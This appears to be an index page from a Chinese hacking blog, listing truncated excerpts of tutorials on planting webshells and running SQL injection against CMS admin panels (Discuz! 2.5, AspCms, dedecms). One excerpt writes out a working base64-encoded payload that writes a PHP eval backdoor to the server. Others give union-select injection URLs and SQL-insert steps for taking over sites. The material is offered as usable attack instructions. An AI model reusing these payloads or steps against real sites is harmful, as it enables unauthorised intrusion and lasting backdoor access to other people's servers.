利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台   有SQL查询功能     在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤   第一句代码   create table cmd (a varchar(5...

- 阅读全文 -

DZ!2.5 后台拿 WebShell 方法!

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...

- 阅读全文 -

aspcms cookies欺骗和后台无验证注入

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗! ————————后台注射————————   https://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,l...

- 阅读全文 -

后台登陆框post注入

作者:knife 目录 0×00 踩点 0×01 寻找漏洞 0×02 利用漏洞 0×03 完结 0x00 踩点 再一次授权情况下 ,本人对骚狐 旗下某个站点发起了一次 友情的渗透 在不知道任何信息的情况下,本人先对骚狐的一些基本服务器信息做了了解 情况如下 服务器是:unix 系统 web版本:nginx/0.7.69 ip:xxx.xxx.xxx.xxx 用了反向代理 0x01 寻找漏洞 对于服...

- 阅读全文 -

dedecms最新0day利用不进后台直接拿WEBSHELL

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞 (https://www.webshell.cc/313.html) 拿webshell的方法如下: 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1...

- 阅读全文 -